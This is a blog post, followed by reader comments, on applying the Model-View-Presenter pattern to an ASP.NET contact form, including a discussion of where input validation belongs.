HMAC digest value is binary data('str' type in python2.x), not an ascii sequence,
so when using `constant_
exception in position `first.
Exception message like this:
UnicodeDeco
I test it in centos 7.1.
Reviewed: https:/
Committed: https:/
Submitter: Zuul
Branch: master
commit e158c10ccb80963
Author: changxun <email address hidden>
Date: Wed May 23 17:13:47 2018 +0800
Fix exception with secretutils
1. There are some problems about the test method.
problem 1:
Unit tests may not cover our function, it depends on the python version
that performed the test.
problem 2:
when using function 'constant_
'second' params are usually HMAC digest values, it is not appropriate to
use utf-8 encoded values as mock data.
2. The previous commit `f1d332a` lead into a bug, but due to the problem 1
and the problem 2, we did not find out the error.
Change-Id: I1c29bfe69f8eda
Closes-Bug: #1772851
This issue was fixed in the openstack/
Fix proposed to branch: master
/review. openstack. org/570151
Review: https:/ | https://bugs.launchpad.net/oslo.utils/+bug/1772851 | CC-MAIN-2019-18 | refinedweb | 192 | 57.47 |
Tips for using Dynamic Link Libraries (DLLs) with MFC
But to do this work properly there are some tips that must be followed. Many of you might be asking asking Why not simply use COM ? The answer is that, of course, COM is a great choice in certain situations. However, DLLs are still a very viable alternative as well. Therefore, in this article. I hope to illustrate just when you should use DLLs and exactly how to use them within the framework of an MFC application.
A big problem of DLLs (specially those that use MFC) are the debug and release version. These versions are incompatible. You probably had the problem of running the debug application version with the DLL release version. The whole world gets crazy!! The best way, in fact the way Microsoft does, is to give diferent names to the DLLs. So the release DLL stays with the Visual C++ project name and the debug version would look like [Project Name]D.DLL. Using this approach you can send the two DLLs to the system directory and be happy. Those are the steps needed to achieve this (suposing the project name is AAA):
- Copy the AAA.def to AAAD.def and change all the AAA to AAAD;
- In the Project/Settings, select Win32 Debug
- Under the tab Link change the Output file name to AAAD.DLL;
- Below in this property page you can see something like:
/def:".\AAA.def" /out:"Debug/AAAD.DLL"
Change to:
/def:".\AAAD.def" /out:"Debug/AAAD.DLL"
Now the the debug version will create AAAD.lib and AAAD.DLL files. When I create a DLL I create an include header to it (I think everybody does), which I named DLL header. This header has all the exported classes definitions. And to be more efficient I include the linking stuff in it, so to use the DLL you doesnt have to add the lib file to the Project Settings. My header looks like:
#ifndef DEF_MUDASDASDASDASDAS #define DEF_MUDASDASDASDASDAS #ifdef _DEBUG #pragma comment(lib, AAAD.lib) #else #pragma comment(lib, AAA.lib) #endif //... the classes definitions goes here #endif //MUDASDASDASDASDAS
Programming for Changes
The prefered kind of DLL used to export classes are the MFC extension DLLs. By using this you can easily instanciate a classe that is within a DLL. To do this you just declare the class like this:
class AFX_EXT_CLASS CFoo { //... }
In the application that uses this class you just include the DLL header and everything is cool. The problem is: everytime you need to include a member variable or a method to an exported class you have to change the DLL header, which means recompile all those who use the DLL. To new methods I dont know a way to overcome this recompilation, but for new variables theres a way.
Instead of declaring the member variables directly to the class body, you create a kind of implementation class, like the sample code:
class CFooImpl; class CFoo { protected: CFooImpl* m_pThis; };
So the CFooImpl class doesnt need to be declare to those how use this DLL. The implementation of CFoo would look like:
class CFooImpl { public: CString m_sName; }; CFoo::CFoo() { m_pThis = new CFooImpl; m_pThis->m_sName = _T("Unknown"); } CFoo::~CFoo() { delete m_pThis; }
Another method to be prepared for changes is to use inteligents structs the way the Windows API does. So you declare a method that has an LPVOID as in and out parameter. Those pointers are address of structs instances. The trick is to define as the first struct member a DWORD regardings its size. This way you know which data is expected.
typedef struct tagCHANGEABLE { DWORD dwSize; long lBytes; }CHANGEABLE, *LPCHANGEABLE; BOOL CFoo::Method(LPVOID lpIn) { LPCHANGEABLE lpChangeable = (LPCHANGEABLE)lpIn; if (lpChangeable->dwSize == sizeof(CHANGEABLE)) { //... return TRUE; } return FALSE; }
Using it:
CFoo myFoo; CHANGEABLE changeable; memset(&changeable, 0, sizeof(changeable)); changeable.dwSize = sizeof(changeable); myFoo.Method(&changeable);
DLL Loaded When Needed
Sometimes you have uncommon situations that you need to call a dialog or create a class instance. So you decide to put those in a DLL, but you dont want it to be loaded when the application gets executed. You want to load the DLL when needed (COM). This kind of DLL I call Dynamic DLL (stupid name I know Dynamic Dynamic link libraries). So you declare the exported function as:
__declspec( DLLexport ) void MyExportedFunc(DWORD dw) { //... }
We need to include this function in the defs files (debug and release). The debug def file would look like this:
; AAAD.def : Declares the module parameters for the DLL. LIBRARY "AAAD" DESCRIPTION 'AAAD Windows Dynamic Link Library' EXPORTS MyExportedFunc @1 ; Explicit exports can go here
Now to use this function we need to load the library, find the function entry point and call it.
typedef void (*MYFUNC)(DWORD); #ifdef _DEBUG HINSTANCE hDLL = AfxLoadLibrary("AAADLLD"); #else HINSTANCE hDLL = AfxLoadLibrary("AAADLL"); #endif if (hDLL) { FARPROC pnProc = GetProcAddress(hDLL, "MyExportedFunc"); MYFUNC pnMyfunc = (MYFUNC)pnProc; pnMyfunc(0); FreeLibrary(hDLL); }
Remember that to use show a dialog you must take care of the resource stuffs (AfxSetResource..). You can use this approach to create class instances. The class definition must use pure virtual functions (to avoid unresolved external symbol). It is just like COM.
The class definition should look like this:
class CFoo { public: virtual void Initialize (CString sName) = 0; };
You implement this "interface" with another class that is not visible through the DLL header file.
class CFooImp : public CFoo { public: CFooImp(); virtual ~CFooImp(); void Initialize (CString sName) { m_sName = sName; } protected: CString m_sName; };
To create an instance of this class (interface) you create an exported function.
__declspec(DLLexport) CFoo* CreateFoo(DWORD dwVersion) { if (dwVersion == CURRENT_VERSION) return new CFooImp; return NULL; }
The application creates the class instance like this:
typedef CFoo* (*MYFUNC)(DWORD); #ifdef _DEBUG HINSTANCE hDLL = AfxLoadLibrary("AAADLLD"); #else HINSTANCE hDLL = AfxLoadLibrary("AAADLL"); #endif if (hDLL) { FARPROC pnProc = GetProcAddress(hDLL, " CreateFoo"); MYFUNC pnMyfunc = (MYFUNC)pnProc; CFoo* pFoo = pnMyfunc(0); pFoo->Initialize(_T("Hi")); delete pFoo; FreeLibrary(hDLL); }
Remember that you cannot free the library until you deleted the CFoo instance.
Conclusion
These examples explained the powers of well designed DLLs. But if the whole project has a bad design no miracle will make your applications easy to change and update. The good design is the first and most important step to the successfull project.
Additional Christian Louboutin added juin paire de FRED Teem Hommes automne / hiver 2012 AU 14 nouveau printed poney mocassin JordanPosted by Vetriatszy on 03/15/2013 01:18pm
amazing choice to achieve Abercrombie revenue even although abercormbie have an overabundance than 1,000 outlets globally,employing up to date misery of the universe industrial state's borders,some expansion display had to be postponed and additionally interim the division terior chain as Ruehl ended up being closed on account of the high cost for going. we are all aware, Abercrombie fasion clients are mainly based on the stores in enormous county, this also often causes large click over here onto rent,Labours with the help of getting the whole sequence, clients abercrombie highlighted however the dog's entire process affordability revenue way those quite a few years, folks selpublishmly commissions or alternatively any kind of low named sustaining trademark enjoy. and also we needed to say that the majority of abercrombie which has made favourable discuss its model to trap ones prefer of teenager and quality of its solution, truthfully to most of individuals, Abercormbie is an inexpensive luxury, individuals could possibly be a more happy, whenever "Abercormbie available for sale" properly developed more frequently. the fabric among abercormbie T-t-shirts the best idea home owner in all of the special type abrcrombie associated with technique is mainly according to 100% cotton, genuine no big-techie artifical style focused, We can observe with out darkness of anxiety that the content expense of a bit of polos is not really before two united states dollar dollars, much to find cotton of the world. in the western world labours, Because lots of the clothing is came down with mamufactured from inside the under-developed gets,Which aren't composing cost for gettingReply
Impart Jordan V Repulsive Awaken Red Mephistophelian qui sortira officiellement le 26 janvier 2013 JordanPosted by Vetriatszy on 03/14/2013 01:38pm
Petersburg's First evening time factors american idol Finalist emmanuel Lynche mirielle Lynche, st. Petersburg, Fla. ancient to Season 9 american idol Finalist, head lines usually the annual upcoming summers eve activities within the local towards Dec. 31, 2010. Lynche has become booked to accomplish on the principal step at northern Straub park your car prior the First Night thousand finish fireworks at nighttime. just for 18 lots of, st. Pete seems to have written involving Florida's most First day merrymaking events. the foregoing spouse-user friendly, booze-Free extravaganza blends a nice of varied entertainments, like hands-by martial arts styles and after that projects, food shopping cart march, exercise involved with preference operatic arias, Puppet live theatre along with favorite bubble stomp. competitions become scheduled along at the boat dock, public in brilliant martial arts styles, Baywalk, straub park system coupled with other general. Petersburg wedding venues as well as includes tampa Bay's maximum fireworks this website arrangement. expect guidance on events in your area? catch e-mailings status updates in the event that absolutely new content is shared by way of clicking on the 'Subscribe' key around. go to this page to speak to your polk bay holidays ExaminerReply | http://www.codeguru.com/cpp/w-p/dll/article.php/c95/Tips-for-using-Dynamic-Link-Libraries-DLLs-with-MFC.htm | CC-MAIN-2015-18 | refinedweb | 1,573 | 51.07 |
i have a string that i want to convert to double. i know atof is a standard library function for that, however, the input argument to atof is (const char*), not string type that i have.
does anyone know how i might convert my string num to double ? thanks
string num = "45.00"; double x = atof(num);
You can use istringstream
std::istringstream stm; stm.str("3.14159265"); double d; stm >>d;
If you are sure that the string is in double conversible format like 1.2e-2, grunt's method is the eaisest. But if you want to check the input string if it can be converted as double, e.g 123abc will be converted as 123 in grunt's method. For easier error checking better use strtod. Just checking the value of end to be null will be enough.
#include <sstream> #include <cstdlib> int main () { std::istringstream stm; char* end = 0 ; double d; stm.str("123abc");// Invalid input string stm >>d; std::cout << d << std::endl; // Returns 123 stm.str("123e-2"); stm >>d; std::cout << d << std::endl; d = strtod( "123abc", &end ); // Invalid input string if ( *end == 0 ) std::cout << d << std::endl; else std::cout << "Error Converting\n"; // Reports error d = strtod( "123e-2", &end ); if ( *end == 0 ) std::cout << d << std::endl; else std::cout << "Error Converting\n"; return 0; }
PS:
To get the characters from
num , use
num.c_str()
thank you all. for the time being my strings are all convertible to double. but i might need wolfpack's suggestion just to be safe
If you want error checking then I would suggest you to use Exception Handling. That will be a better option.
Which brings us to this: | http://www.daniweb.com/software-development/cpp/threads/54367/string-to-double | CC-MAIN-2014-15 | refinedweb | 285 | 83.36 |
Anything related to i18n/i10n subject seem to be somehow quirkier than it looks at first glance. Python (2.x) itself and handling of unicode is a story apart.
This time I was looking into building a small website that has to provide UI in different languages. As this is one of the things you want to have right away I’ve started experimenting with adding i18n and i10n support.
First step is easy, the
settings.py already had proper settings. Then for .py files it is rather straightforward to add e.g. (for forms):
from django.utils.translation import ugettext_lazy as _
...
city_name = forms.CharField( required = False, label = _('City:'))
For the .html files something like
{% load i18n %}
{% trans "Hello there!" %}
Then create under project folder folder ‘conf/locale’ (if you don’t do this it will complain), and then run
django-admin.py makemessages -l ru
Edit the resulting django.po file, add translations to your messages.
Warning: don’t forget to edit the following field, which comes EMPTY first, even while you have given it a parameter! Otherwise this file will be not used properly.
"Language: ru\n"
Then compile your nice and shiny translations:
django-admin.py compilemessages
Now we get all messages available. At least they should. But there is another trick missed in the Django documentation/tutorials: you HAVE TO specify the location of the message files explicitly in your
settings.py otherwise your texts will continue coming up in default (en) language no matter how hard you try. E.g.:
LOCALE_PATHS = (
os.path.join(os.path.dirname(__file__), 'conf', 'locale').replace('\\','/'),
)
Well, after all this it seems to work. But it costs quite some searching and poking around to come to this. I can imagine after several rounds this becomes obvious, but you don’t get any errors, warnings, whatsoever, it just does not what you want it to do. Well, I hope it will do it for you now :).
Happy Djangoing! | http://blog.bidiuk.com/2013/04/setting-up-dango-i18n-i10n/ | CC-MAIN-2021-31 | refinedweb | 329 | 68.26 |
O(m+n) time, O(1) space but need to temporarily modify the structure.
a1 ->->-> c1 ->->-> c3 ↑ | b1 ->->
Method description:
- Find the length of (a1->c3), countA, and get the tail
- Find the length of (b1->c3), countB, get the tail c3, and reverse
the whole (b1->c3) link to (c3->b1)
- Find the length of (a1->b1), countX
- Reverse (c3->b1) back to (b1->c3)
- If the first two tails are not equal, return None
- Proceed from a1 by (countA - (countA+countB-countX+1)/2) nodes, and
return that
It tries to count the length of the branches.
436ms in Python which is among the top 3%
class Solution: # Count the nodes and return the tail and the length # return (tail, len) def countNodes(self, head): count = 1 while head.next is not None: count += 1 head = head.next return (head, count) # Count the nodes, reverse the whole link, and return the original tail and the length # return (tail, len) def reverseNodes(self, head): count = 1 prev = head now = prev.next prev.next = None while now is not None: count += 1 temp = now.next now.next = prev prev = now now = temp return (prev, count) # @param two ListNodes # @return the intersected ListNode def getIntersectionNode(self, headA, headB): if headA is None or headB is None: return None tailA, countA = self.countNodes(headA) tailB, countB = self.reverseNodes(headB) _, countX = self.countNodes(headA) self.reverseNodes(tailB) if tailA is not tailB: return None for _ in range(countA - (countA+countB-countX+1)/2): headA = headA.next return headA | https://discuss.leetcode.com/topic/21685/a-new-method-different-from-any-of-the-solution-provided | CC-MAIN-2017-47 | refinedweb | 257 | 68.1 |
Part 1: Functions as Objects
First, lets start Python. For Part 1, we will do everything using ipython, which provides a nice interactive python shell. We start ipython using the command
ipython
(note that you must be using Python 2 for this workshop and not using Python 3. Complete this workshop using Python 2, then read about the small changes if you are interested in using Python 3)
Functional programming is based on treating a function in the same way as you would a variable or object. So, to start, we should first create a function. This will be a simple function that just adds together two numbers. Please type in ipython
def sum(x,y): """Simple function returns the sum of the arguments""" return x+y
This is a very simple function that just returns the sum of its two arguments. Call the function using, e.g.
result = sum(3,7) print(result)
which should print out
10.
In functional programming, a function is treated in exactly the same way as a variable or an object. This means that a function can be assigned to a variable, e.g. type
a = sum result = a(3,7) print(result)
This should print
10 again. Here, we have assigned the function
sum
to the variable
a. So how does this work?
For variables, you should be comfortable with the idea that a variable is a container for a piece of data. For example,
b = 10
would create a piece of data (the integer
10) and will place it into
the container (the variable
b). When we type
a = b
we are copying the data from
b and placing it into the variable
a.
Now both
a and
b contain (or point to) the same data.
For functional programming, the code of a function is also treated like a piece of data. The code
def sum(x,y): """Simple function returns the sum of the arguments""" return x+y
creates a new piece of data (the code to sum together
x and
y), and
places that code into a container (the variable
sum). When we
then typed
a = sum
we copied the code data from
sum and placed it into the variable
a.
Now both
a and
sum contain (or point to) the same data, i.e. the same
code that sums together the two arguments (e.g.
sum(3,7) and
a(3,7)
will call the same code, and give the same result).
This means that “code of a function” is a type, in the same way that “integer”, “string” and “floating point number” are types.
Properties of a Function
Just as “integer” and “string” have properties, so to does “function”. Type into ipython
sum.__[TAB]
(where
[TAB] means that you should press the tab key)
This should show something like
sum.__call__ sum.__dict__ sum.__hash__ sum.__reduce_ex__ sum.__class__ sum.__doc__ sum.__init__ sum.__repr__ sum.__closure__ sum.__format__ sum.__module__ sum.__setattr__ sum.__code__ sum.__get__ sum.__name__ sum.__sizeof__ sum.__defaults__ sum.__getattribute__ sum.__new__ sum.__str__ sum.__delattr__ sum.__globals__ sum.__reduce__ sum.__subclasshook__
(exactly what you see will depend on your version of python)
This is the list of properties (functions and variables) of a function. The most
interesting variables are
__name__ and
__doc__. Try typing
print(sum.__name__) print(sum.__doc__)
From the output, can you guess what these two variables contain?
Functions as Arguments
As well as assigning functions to variables, you can also pass functions as arguments. Type this into ipython;
def call_function( func, arg1, arg2 ): """Simple function that calls the function 'func' with arguments 'arg1' and 'arg2', returning the result""" return func(arg1, arg2) result = call_function( sum, 3, 7 ) print(result)
This should print out
10. Can you see why?
The function
call_function takes three arguments. The first
is the function to be called. The second two arguments are
the arguments that will be passed to that function. The
code in
call_function simply calls
func using the
arguments
arg1 and
arg2. So far, so useless…
However, let us now create another function, called difference. Please type into ipython
def diff(x, y): """Simple function that returns the difference of its arguments""" return x-y
and then type
result = call_function(diff, 9, 2) print(result)
What do you now see? What has happened here?
Now we have passed
diff to
call_function,
and so
func(arg1,arg2) has used the code contained
in
diff, e.g. calculating the difference of the
two numbers. The result,
7, should be printed.
You are probably now wondering how has this helped? Well,
let us now change
call_function. Please type into ipython
def call_function(func, arg1, arg2): """Simple function that returns the difference of its arguments""" print("Calling function %s with arguments %s and %s." % \ (func.__name__, arg1, arg2) ) result = func(arg1, arg2) print("The result is %s" % result) return result
Now type
result = call_function(sum, 3, 7)
You should see printed to the screen
Calling function sum with arguments 3 and 7. The result is 10
Now try
result = call_function(diff, 9, 2)
You should now see
Calling function diff with arguments 9 and 2. The result is 7
The new
call_function is now doing something useful. It is
printing out extra information about our functions, and can
do that for any function (which accepts two arguments) that
we pass. For example, now type
def multiply(x, y): """Simple function that returns the multiple of the two arguments""" return x * y result = call_function( multiply, 4, 5 )
You should see
Calling function multiply with arguments 4 and 5. The result is 20 | https://chryswoods.com/parallel_python/functions.html | CC-MAIN-2018-17 | refinedweb | 937 | 72.05 |
Working with Dates and Times
This document is meant to provide on overview of the assumptions and limitations of the driver time handling, the reasoning behind it, and describe approaches to working with these types.
timestamps (Cassandra DateType)
Timestamps in Cassandra are timezone-naive timestamps encoded as millseconds since UNIX epoch. Clients working with timestamps in this database usually find it easiest to reason about them if they are always assumed to be UTC. To quote the pytz documentation, “The preferred way of dealing with times is to always work in UTC, converting to localtime only when generating output to be read by humans.” The driver adheres to this tenant, and assumes UTC is always in the database. The driver attempts to make this correct on the way in, and assumes no timezone on the way out.
Write Path
When inserting timestamps, the driver handles serialization for the write path as follows:
If the input is a
datetime.datetime, the serialization is normalized by starting with the
utctimetuple() of the
value.
If the
datetimeobject is timezone-aware, the timestamp is shifted, and represents the UTC timestamp equivalent.
If the
datetimeobject is timezone-naive, this results in no shift – any
datetimewith no timezone information is assumed to be UTC
Note the second point above applies even to “local” times created using
now():
>>> d = datetime.now() >>> print(d.tzinfo) None
These do not contain timezone information intrinsically, so they will be assumed to be UTC and not shifted. When generating
timestamps in the application, it is clearer to use
datetime.utcnow() to be explicit about it.
If the input for a timestamp is numeric, it is assumed to be a epoch-relative millisecond timestamp, as specified in the CQL spec – no scaling or conversion is done.
Read Path
The driver always assumes persisted timestamps are UTC and makes no attempt to localize them. Returned values are
timezone-naive
datetime.datetime. We follow this approach because the datetime API has deficiencies around daylight
saving time, and the defacto package for handling this is a third-party package (we try to minimize external dependencies
and not make decisions for the integrator).
The decision for how to handle timezones is left to the application. For the most part it is straightforward to apply
localization to the
datetimes returned by queries. One prevalent method is to use pytz for localization:
import pytz user_tz = pytz.timezone('US/Central') timestamp_naive = row.ts timestamp_utc = pytz.utc.localize(timestamp_naive) timestamp_presented = timestamp_utc.astimezone(user_tz)
This is the most robust approach (likely refactored into a function). If it is deemed too cumbersome to apply for all call sites in the application, it is possible to patch the driver with custom deserialization for this type. However, doing this depends depends some on internal APIs and what extensions are present, so we will only mention the possibility, and not spell it out here.
date, time (Cassandra DateType)
Date and time in Cassandra are idealized markers, much like
datetime.date and
datetime.time in the Python standard
library. Unlike these Python implementations, the Cassandra encoding supports much wider ranges. To accommodate these
ranges without overflow, this driver returns these data in custom types:
util.Date and
util.Time.
Write Path
For simple (not prepared) statements, the input values for each of these can be either a string literal or an encoded integer. See Working with dates or Working with time for details on the encoding or string formats.
For prepared statements, the driver accepts anything that can be used to construct the
util.Date or
util.Time classes. See the linked API docs for details.
Read Path
The driver always returns custom types for
date and
time.
The driver returns
util.Date for
date in order to accommodate the wider range of values without overflow.
For applications working within the supported range of [
datetime.MINYEAR,
datetime.MAXYEAR], these are easily
converted to standard
datetime.date insances using
Date.date().
The driver returns
util.Time for
time in order to retain nanosecond precision stored in the database.
For applications not concerned with this level of precision, these are easily converted to standard
datetime.time
insances using
Time.time(). | https://docs.datastax.com/en/developer/python-driver/3.11/dates_and_times/ | CC-MAIN-2020-24 | refinedweb | 692 | 57.27 |
- Date and Time API
-
- nscd projects
- Translations
- Improve the.
- When a test depends on another test, failure in the dependency should cause the depending test to return UNRESOLVED, not FAIL or PASS.
-..
There should be a test that the inttypes.h format macros match the corresponding typedefs. See message.
Possibly test-skeleton.c should be split into a part always built with _GNU_SOURCE, built once and linked into all tests, and a minimal part that can be included in tests built for other standards.
Review uses of add_temp_file in tests. Temporary files should be created in the preparation part of a test (do_prepare rather than do_test) where possible so that they are deleted in the case of abnormal termination in the TEST_DIRECT case. In the common case where files are created with mkstemp, moving to creation with create_temp_file, which deals automatically with registering the files with add_temp_file, is a good idea. Uses of create_temp_file also need to be reviewed for being in the preparation part of tests where possible. and for "POSIX".
-, -ffinite-math-only).
Consider more precise conventions for associating bugs with xfailed tests - see
Miscellaneous testsuite issues
- The c++-types tests should cover more types from more headers (preferably, every typedef glibc provides as a public interface, since any such type could be used in C++ code and needs a stable ABI there).
- Cover more standards in the linknamespace tests...
Make check-abi targets generate and combine .sum files. See message.
Tests are generally built with internal headers and with _LIBC defined. As far as possible, tests should be built using only the headers that get installed and without _LIBC defined, so they test something closer to how the installed libraries would be used. (At present, tests can define _ISOMAC if they need to disable most internal header contents.)". Many tests that currently execute could actually be implemented as compilation tests (where testing values of constants).
-.. The reference implementation of the Time Zone Database addresses this by having four new functions declared in <time.h>:
tzalloc accepts a string like "Europe/Moscow" and returns a newly allocated object of type timezone_t that represents the rules for the named time zone.
tzfree frees a timezone_t object.
localtime_rz is like localtime_r except with a timezone_t argument prepended.
mktime_z is like mktime except with a timezone_t argument prepended.
This API is derived from a more-complex API in NetBSD. NetBSD is intending to switch to match the simpler reference API. It is not known if there are any other systems with these primitives other than Minix 3, which uses this part of NetBSD userland..
- Based on the sprof program we need tools to analyze the output. The result should be a link map which specifies in which order the .o files are placed in the shared object. This should help to improve code locality and result in a smaller footprint (in code and data memory) since less pages are only used in small parts.
Security
Build more of glibc with `-fstack-protector`.
Start building glibc with `-fstack-protector-strong`.
Start building glibc with -fsanitize-address and other sanitizers. (See here)
Fix open security bugs. See Security Process.
Update glibc programs (especially nscd) to use Linux namespaces.
Update glibc programs (especially nscd) to use Linux seccomp..
Review existing -Wno- options in makefiles to see if they are still needed, and whether the code in question could be cleaned up to avoid the warnings instead. If needed but the code is maintained in glibc rather than imported from elsewhere, convert to diagnostic pragmas (via the DIAG_* macros) as far as possible..
- non-ex-ports architectures should be more like ex-ports architectures regarding putting configuration information in sysdeps files instead of architecture-independent files. Specifically:
- or -fasynchronous-unwind-tables, make them use makefile variables that relate to the logical reason those options are needed (e.g. "may be cancelled"), as described in) - and similarly for uses of __THROW etc. in function declarations..
Use __NR_* directly in Linux-specific .S files, not SYS_* or SYS_ify. See message.. All such symbols with a good reason to be in the public ABI for new links should have comments in the Versions files explaining the reason.
-)
Review interfaces conditioned on __USE_MISC to see if some should be obsoleted. See message (and some other messages in that thread).
Use <intprops.h> within glibc for integer overflow checks .
Make Glibc buildable with Clang. See GlibcMeetsClang
Various atomics and locking files have conditionals on a macro UP (uniprocessor), which nothing defines. Remove all those conditionals.
Some files have #ifdef or #ifndef conditionals on macros weak_alias and libc_hidden_def from libc-symbols.h. Such conditionals may be a relic of non-ELF support; they should all be removed. (Watch out however for files undefining those macros before including another file; the normal approach is to undefine then redefine with an empty expansion, but you need to make sure there aren't any cases relying on a conditional in the included file.)
Review __libc_* and *_internal function aliases / names (in syscalls.list files and elsewhere) and remove those that are no longer used (no callers for those names). Specific cases to look at include _dl_skip_args_internal and __canonicalize_directory_name_internal.
Remove obsolete linuxthreads references in the source tree.
Remove USE_REGPARMS and define internal_function in a sysdeps header instead. See message.
Develop some automation to ensure that include/ declarations of __* function aliases have the same attributes, use of __THROW etc. as the declarations of the corresponding public interfaces, and fix the issues shown up.
Use typeof where possible for declaring such aliases, with comments when there is some reason the type has to be repeated in the internal header.
Develop some automation to ensure that internal calls have it visible to the compiler that the function is hidden, and fix cases shown up where it is not hidden. See bug 18822 for the i386 case.
- Review public function declarations for more attributes that should be on them.. (This is only actually a problem for variables in arrays, because of the use of -fmerge-all-constants.)
-1814 or any more recent version of the proposed updated bindings.
Support the third part of the IEEE 754-2008 bindings (N18341836.
The tests in pow_test_data in libm-test.inc and auto-libm-test-in should be sorted into a more logical order; there may be duplicates to remove..
- A user-level STREAMS implementation should be available if the kernel does not provide the support. This is a much lower priority job now that STREAMS are optional in XPG.
- More conversion modules for iconv(3). Existing modules should be extended to do things like transliteration if this is wanted. For often used conversion a direct conversion function should be available.
The strptime' function needs to be completed. This includes among other things that it must get teached about timezones. The solution envisioned is to extract the timezones from the ADO timezone specifications. Special care must be given names which are used multiple times. Here the precedence should (probably) be according to the geograhical distance. E.g., the timezone EST should be treated as the Eastern Australia Time' instead of the US `Eastern Standard Time' if the current TZ variable is set to, say, Australia/Canberra or if the current locale is en_AU.. (The std-isoc and std-posix keywords have been added for this purpose.)
-...
nscd projects
Support invalidating more than one database at a time (e.g. nscd -i passwd group hosts services)
Support invalidating all databases (e.g. nscd -I)
Translations
Write translations for the GNU libc message for the so far unsupported languages. GNU libc is fully internationalized and users can immediately benefit from this. Please visit and work with the translation project. | http://sourceware.org/glibc/wiki/Development_Todo/Master?highlight=%28%28Development_Todo%7CEnhancing_malloc%29%29 | CC-MAIN-2016-50 | refinedweb | 1,285 | 56.96 |
set_volume_per_voice man page
set_volume_per_voice — Sets the volume of a voice. Allegro game programming library.
Synopsis
#include <allegro.h>
void set_volume_per_voice(int scale);
Description
By default, Allegro will play a centered sample at half volume on both the left and right channel. A sample panned to the far right or left will be played at maximum volume on that channel only. This is done so you can play a single panned sample without distortion. If you play multiple samples at full volume, the mixing process can result in clipping, a noticeable form of distortion. The more samples, the more likely clipping is to occur, and the more clipping, the worse the output will sound.
If clipping is a problem - or if the output.
Each time you increase the parameter by one, the volume of each voice will halve. For example, if you pass 4, you can play up to 16 centred samples at maximum volume without distortion..
Note: The default behaviour has changed as of Allegro 4.1.15. If you would like the behaviour of earlier versions of Allegro, pass -1 to this function. Allegro will choose a value dependent on the number of voices, so that if you reserve n voices, you can play up to n/2 normalised samples with centre panning without risking distortion. The exception is when you have fewer than 8 voices, where the volume remains the same as for 8 voices. Here are the.
See Also
reserve_voices(3), set_volume(3), install_sound(3), detect_digi_driver(3), detect_midi_driver(3)
Referenced By
reserve_voices(3). | https://www.mankier.com/3/set_volume_per_voice | CC-MAIN-2018-05 | refinedweb | 256 | 65.32 |
The MVP is used for a lot of reasons, but mainly it does a **VERY** nice job of separating business logic from the UI.
M. = Model
V. = View
P. = Presenter
UX. = User Experience ( Web Form in this case)
In this implementation of MVP, Model will not be used. Only V and P with UX. The Model is where your data activity, and other "stuff" goes. This example is just meant to show how to get business logic out of your UX code.();
}
}
I hope this is helpful, and is a good starting point for the pattern.
Interesting. Where would validation take place in this configuration?
Cheers, Pete
This isn't a good MVP pattern.
Using a Label control to render HTML is like using an object variable to store all your variables. It's wrong. Don't do it.
I'm actually working on an ASP.NET project where the original developer uses HTML string builders and Label controls render all his HTML.
Let's not try to wedge MVP into frameworks like ASP.NET that don't support it well. Rather, let's change ASP.NET to support MVP better.
A brief description of the Model section would also be interesting.
Thanks, Dan
This is a good example and easy to understand since I'm just beginning to learn the MVP pattern. I was wondering if you could show an example with the Model so I can complete the picture.
can you also recommend a namespace naming convention for MVP model?
Joe Chung,
I'm not sure I follow. The label control is a simple control in asp.net. The only thing i don't like about this example, is that I stuffed HTML back into the result. In a win forms app, that wouldn't work.
But that's not the point here. the point is to show how to separate the code nicely.
Just because someone misused a control once, doesn't make it a bad control.
The beauty is that since I don't have code behind dictating my UX, i could easily change it to a placeholder, another customer server control, or anything, **WITHOUT** changing my biz logic.
Pete,
Validation is a very interesting question. I get asked this a lot. My first answer is alway, X types of validation, not one, so validation can, and should, live in multiple places.
Here's an example.
The UX as the user to supply a date. I believe that the UX should have some UX validation, to ensure that the date is in-fact valid. Web does this diff than Win, which does it diff than smart client(phone), which again would be different on a cash register. So I think validation of user input should be in the UX. It's UX code. It directly effects the UX and nothing but the UX.
Then I think there should be business validation. Birthday for example, for your current customers, should not be more that 1XX years old. You decide the number, i don't care. This is a business decision on a date, that should be validated in the business code.
Validation Duplication? (nice rhyming)
Some validation will no doubt be duplicated. I'm OK with that - better safe than sorry.
I look at is like this. They're two diff systems. I'm in charge of the Business, and You're in charge of the UX.
It's up to you to create a pretty/nice/working/easy to use UX. If you don't validate the date, I will, and I'll throw and exception for you to catch. (hopefully you'll catch it right?)
Central Validation.
I'm not saying that I'd put validation all over the client code either.
I'd probably create a central routine for the interface like...
public bool ContactUsValidator(IReaderContactUs instance) {
bool result;
/// do some checking on "instance"
return result.
}
Hope that helps.
-=- Scott
I for one appreciate you taking the time out of your schedule to write this blog. You never claimed to offer a "purist" version of MVP. What you *did* accomplish is giving other ASP.NET developers an opportunity to think outside of the box... do something different.
If possible, I would like to see a follow-up blog (part 2) to demonstrate the whole point. Perhaps show screenshots of different UX implementations?
To expand on scott's example, if you needed to validate the user's input before kicking off process, you would want to modify the Interface like so.
public interface IReaderContactUs
{
string Name { get; }
string NameIsValid{set;}
string Email { get; }
string EmailIsValid{set;}
string PhoneNumber { get; }
string PhoneNumberIsValid { set; }
string Message { get; }
string MessageIsValid { set; }
string Result { set; }
This will allow the UI to render whatever it needs when something is invalid. Though to seperate concerns you may want to make an IValidateContactUs and leave the original IReaderContactUs alone.
Brian Leahy,
This is a solution, but you're relying on the client (the UX) to do validation. Depending on the scenario, this may be OK. If you trust the client developer.
And if that's good, I REALLY recommend separating the interfaces. IValidateContactUs.
Opps i biffed that one, no wonder the confusion. I meant to make interfaces like so:
public interface IRequireContactUsValidation
string Name { get; }
string NameIsValid{set;}
string Email { get; }
string EmailIsValid{set;}
string PhoneNumber { get; }
string PhoneNumberIsValid { set; }
string Message { get; }
string MessageIsValid { set; }
string Result { set; }
Where an IValidateContactUs has the method
public void ValidateContactUs();
taking IRequireContactUsValidation in it's constructor.
If the Interface is seperated to an IValidateContactUs that would allow one developer to write the validation logic which is testable, and the UI developer to center on The Validation error display.
So lets say company x has different validation rules from company y. When writing validation rules you would have two concrete implementors of the IValidateContactUs. The UI developer would select which validator to use and which presentor to use, not concerning himself with that logic.
If Customer x wants red circles to display when a field is invalid, then when implementing NameIsValid in the IRequireContactUsValidation(long name i know), he/she would put something like:
NameIsValid { set{ _nameIsInvalidErrorNotice.Visable = value;}}
Where _nameIsInvalidErrorNotice is a control that displays a flashing red circle next to your _txtName textbox.
